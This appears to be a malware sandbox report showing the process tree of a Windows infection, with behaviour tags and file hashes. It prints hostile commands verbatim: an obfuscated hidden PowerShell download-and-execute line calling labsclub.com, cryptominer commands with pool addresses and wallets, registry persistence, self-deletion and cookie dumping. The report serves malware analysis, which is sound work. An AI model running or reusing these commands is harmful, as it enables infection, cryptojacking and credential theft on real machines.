C:\Users\Admin\AppData\Local\Temp\is-PEF0T.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-PEF0T.tmp\vpn.tmp" /SL5="$202AC,15170975,270336,C:\Users\Admin\AppData\Local\Temp\teeiyycvtly\vpn.exe" /silent /subid=48216⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5660
-
-
-
C:\Users\Admin\AppData\Local\Temp\v4fzxhlkqvz\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\v4fzxhlkqvz\cpyrix.exe" /VERYSILENT15⤵
- Suspicious use of SetWindowsHookEx
PID:6400 -
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵
- Suspicious use of SetWindowsHookEx
PID:5600 -
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"17⤵PID:7776
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub17⤵PID:7964
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe18⤵
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1464
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵
- Suspicious use of SetThreadContext
PID:6600 -
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:7688
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1PC79Z6LY3\setups.exe"C:\Users\Admin\AppData\Local\Temp\1PC79Z6LY3\setups.exe" ll12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6340 -
C:\Users\Admin\AppData\Local\Temp\is-OVA42.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-OVA42.tmp\setups.tmp" /SL5="$50406,635399,250368,C:\Users\Admin\AppData\Local\Temp\1PC79Z6LY3\setups.exe" ll13⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:6480
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4056 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:6392
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\namqta2oeyw\vict.exe"C:\Users\Admin\AppData\Local\Temp\namqta2oeyw\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2432 -
C:\Users\Admin\AppData\Local\Temp\is-QI7QH.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-QI7QH.tmp\vict.tmp" /SL5="$10378,870426,780800,C:\Users\Admin\AppData\Local\Temp\namqta2oeyw\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\is-S2LHU.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-S2LHU.tmp\win1host.exe" 53510⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5540 -
C:\Users\Admin\AppData\Local\Temp\QJXVwuoxW.exe"C:\Users\Admin\AppData\Local\Temp\QJXVwuoxW.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6500 -
C:\Users\Admin\AppData\Local\Temp\QJXVwuoxW.exe"C:\Users\Admin\AppData\Local\Temp\QJXVwuoxW.exe"12⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:6708
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\s13tx03ujhk\v3wwyw3mqci.exe"C:\Users\Admin\AppData\Local\Temp\s13tx03ujhk\v3wwyw3mqci.exe"8⤵
- Executes dropped EXE
PID:3140 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\s13tx03ujhk\v3wwyw3mqci.exe"9⤵PID:5220
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5324
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xu2zz5lpy3c\app.exe"C:\Users\Admin\AppData\Local\Temp\xu2zz5lpy3c\app.exe" /8-238⤵
- Executes dropped EXE
PID:2864 -
C:\Users\Admin\AppData\Local\Temp\xu2zz5lpy3c\app.exe"C:\Users\Admin\AppData\Local\Temp\xu2zz5lpy3c\app.exe" /8-239⤵PID:6612
-
-
-
C:\Users\Admin\AppData\Local\Temp\zoho3f2etdo\tskbyhbbld2.exe"C:\Users\Admin\AppData\Local\Temp\zoho3f2etdo\tskbyhbbld2.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3144
-
-
C:\Users\Admin\AppData\Local\Temp\hq23itiia3y\h3adlpt0ixf.exe"C:\Users\Admin\AppData\Local\Temp\hq23itiia3y\h3adlpt0ixf.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:3972 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hq23itiia3y\h3adlpt0ixf.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hq23itiia3y\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617176558 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:6584
-
-
-
C:\Users\Admin\AppData\Local\Temp\lrlmnvlmqbh\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\lrlmnvlmqbh\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4780 -
C:\Users\Admin\AppData\Local\Temp\is-KRA3T.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-KRA3T.tmp\IBInstaller_97039.tmp" /SL5="$30410,14574851,721408,C:\Users\Admin\AppData\Local\Temp\lrlmnvlmqbh\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2292 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-ML3RM.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5448
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-ML3RM.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵
- Drops file in Windows directory
PID:5648
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵
- Checks computer location settings
PID:7692
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6632
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:5764
-
-
C:\Users\Admin\AppData\Local\Temp\is-ML3RM.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-ML3RM.tmp\{app}\chrome_proxy.exe"10⤵PID:324
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0rfyby02cga\vpn.exe"C:\Users\Admin\AppData\Local\Temp\0rfyby02cga\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5180 -
C:\Users\Admin\AppData\Local\Temp\is-FEQPI.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-FEQPI.tmp\vpn.tmp" /SL5="$20412,15170975,270336,C:\Users\Admin\AppData\Local\Temp\0rfyby02cga\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5276 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5308
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:4892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:5228
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:4652
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7364
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7320
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JWV1B5M560\setups.exe"C:\Users\Admin\AppData\Local\Temp\JWV1B5M560\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\is-KD60A.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-KD60A.tmp\setups.tmp" /SL5="$40112,635399,250368,C:\Users\Admin\AppData\Local\Temp\JWV1B5M560\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4852 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:5140
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5340 -
C:\Users\Admin\AppData\Roaming\5768.tmp.exe"C:\Users\Admin\AppData\Roaming\5768.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5256 -
C:\Users\Admin\AppData\Roaming\5768.tmp.exe"C:\Users\Admin\AppData\Roaming\5768.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4576
-
-
-
C:\Users\Admin\AppData\Roaming\5C2B.tmp.exe"C:\Users\Admin\AppData\Roaming\5C2B.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4896 -
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4628
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
PID:6200
-
-
-
C:\Users\Admin\AppData\Roaming\61F9.tmp.exe"C:\Users\Admin\AppData\Roaming\61F9.tmp.exe"5⤵
- Executes dropped EXE
PID:5320 -
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\61F9.tmp.exe6⤵PID:5708
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:3428
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:6548
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6880
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:7412
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:6644
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:3864
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7672
-
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4784 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:5824
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2580
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2608
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1464
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
C:\Users\Admin\AppData\Local\Temp\is-NTVID.tmp\tskbyhbbld2.tmp"C:\Users\Admin\AppData\Local\Temp\is-NTVID.tmp\tskbyhbbld2.tmp" /SL5="$201F4,2592217,780800,C:\Users\Admin\AppData\Local\Temp\zoho3f2etdo\tskbyhbbld2.exe" /VERYSILENT1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1032 -
C:\Users\Admin\AppData\Local\Temp\is-8P5HP.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-8P5HP.tmp\winlthsth.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5472 -
C:\Users\Admin\AppData\Local\Temp\NoQIom6aF.exe"C:\Users\Admin\AppData\Local\Temp\NoQIom6aF.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6736 -
C:\Users\Admin\AppData\Local\Temp\NoQIom6aF.exe"C:\Users\Admin\AppData\Local\Temp\NoQIom6aF.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6936
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:7088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵
- Blocklisted process makes network request
PID:6792
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:4256 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5BC3E3E6081A9B293F7FB28C4E391604 C2⤵
- Loads dropped DLL
PID:5744
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B9189FFE8030EAA5832B2AC430B0C7252⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:6984
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
PID:6164 -
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵PID:7756
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4628
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:2104 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1e86f109-b397-2544-9e2c-371ffa9f6477}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:3920
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:708
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:7208
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:6324
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6524
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\1f3a5288875347b0bc068c9a19244dbc /t 1080 /p 63241⤵PID:5812
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2212
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:7560
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5144
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:7700
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6432
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
fa65eca2a4aba58889fe1ec275a058a8
SHA10ecb3c6e40de54509d93570e58e849e71194557a
SHA25695e69d66188dd8287589817851941e167b0193638f4a7225c73ffbd3913c0c2e
SHA512916899c5bfc2d1bef93ab0bf80a7db44b59a132c64fa4d6ab3f7d786ad857b747017aab4060e5a9a77775587700b2ac597c842230172a97544d82521bfc36dff
-
MD5
a75fa03d387f97c9eca192ad9d8bf663
SHA13f36cb5a1c5d6140a8575a3ce08ebb89c521d9f7
SHA2563217aa45218d2616c92ba1d1688088deeb959f7a0f70867582f55d7bb16ea611
SHA512c1e93aea7a19416f8ba8eff90e9153d435cc329a5a6f28284750438cd68f2751589b6cff66028ceb51e54c9f250b640cb42f2125f07c323b01732a1b2dfc2007
-
MD5
a75fa03d387f97c9eca192ad9d8bf663
SHA13f36cb5a1c5d6140a8575a3ce08ebb89c521d9f7
SHA2563217aa45218d2616c92ba1d1688088deeb959f7a0f70867582f55d7bb16ea611
SHA512c1e93aea7a19416f8ba8eff90e9153d435cc329a5a6f28284750438cd68f2751589b6cff66028ceb51e54c9f250b640cb42f2125f07c323b01732a1b2dfc2007
-
MD5
a75fa03d387f97c9eca192ad9d8bf663
SHA13f36cb5a1c5d6140a8575a3ce08ebb89c521d9f7
SHA2563217aa45218d2616c92ba1d1688088deeb959f7a0f70867582f55d7bb16ea611
SHA512c1e93aea7a19416f8ba8eff90e9153d435cc329a5a6f28284750438cd68f2751589b6cff66028ceb51e54c9f250b640cb42f2125f07c323b01732a1b2dfc2007
-
MD5
a75fa03d387f97c9eca192ad9d8bf663
SHA13f36cb5a1c5d6140a8575a3ce08ebb89c521d9f7
SHA2563217aa45218d2616c92ba1d1688088deeb959f7a0f70867582f55d7bb16ea611
SHA512c1e93aea7a19416f8ba8eff90e9153d435cc329a5a6f28284750438cd68f2751589b6cff66028ceb51e54c9f250b640cb42f2125f07c323b01732a1b2dfc2007
-
MD5
3f1498c07d8713fe5c315db15a2a2cf3
SHA1ef5f42fd21f6e72bdc74794f2496884d9c40bbfb
SHA25652ca39624f8fd70bc441d055712f115856bc67b37efb860d654e4a8909106dc0
SHA512cb32ce5ef72548d1b0d27f3f254f4b67b23a0b662d0ef7ae12f9e3ef1b0a917b098368b434caf54751c02c0f930e92cffd384f105d8d79ee725df4d97a559a3d
-
MD5
110aee72bede3edec5a64a051b76411e
SHA1bc8741f9d00b86396795fee31280d504618d5f64
SHA256a993fa89fd12637d187e03195454cfccf99427744deb86c065bc55c152fb728c
SHA512848b7ad5b2cc9a7573016571a32f3cc863555fe097b6f7664a94cb7d9c5fd417cdb378e77dfe097929c4e3eeecd7df52c77352f7b866d8f9841c98902d484a60
-
MD5
110aee72bede3edec5a64a051b76411e
SHA1bc8741f9d00b86396795fee31280d504618d5f64
SHA256a993fa89fd12637d187e03195454cfccf99427744deb86c065bc55c152fb728c
SHA512848b7ad5b2cc9a7573016571a32f3cc863555fe097b6f7664a94cb7d9c5fd417cdb378e77dfe097929c4e3eeecd7df52c77352f7b866d8f9841c98902d484a60
-
MD5
b990e93a4386c13768f8f3285a0ca37d
SHA15bcbe2f8ad3c72190d5553c084aa3e47d810a495
SHA256231ff2dfc7be6eb47f9b0c6393ea4fceb71bf66f67b00d3dffea0e58b44b5603
SHA5127360395347094ef69a509ddf3040afcd8083907c1539b1af12b0ea08bf6835b600e765916ee6dc18242f85e1a038adf6aaecab15487076a52b8a02e89874bedb
-
MD5
b990e93a4386c13768f8f3285a0ca37d
SHA15bcbe2f8ad3c72190d5553c084aa3e47d810a495
SHA256231ff2dfc7be6eb47f9b0c6393ea4fceb71bf66f67b00d3dffea0e58b44b5603
SHA5127360395347094ef69a509ddf3040afcd8083907c1539b1af12b0ea08bf6835b600e765916ee6dc18242f85e1a038adf6aaecab15487076a52b8a02e89874bedb
-
MD5
65b49b106ec0f6cf61e7dc04c0a7eb74
SHA1a1f4784377c53151167965e0ff225f5085ebd43b
SHA256862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd
SHA512e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da
-
MD5
65b49b106ec0f6cf61e7dc04c0a7eb74
SHA1a1f4784377c53151167965e0ff225f5085ebd43b
SHA256862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd
SHA512e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da
-
MD5
c615d0bfa727f494fee9ecb3f0acf563
SHA16c3509ae64abc299a7afa13552c4fe430071f087
SHA25695d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199
SHA512d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51
-
MD5
c615d0bfa727f494fee9ecb3f0acf563
SHA16c3509ae64abc299a7afa13552c4fe430071f087
SHA25695d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199
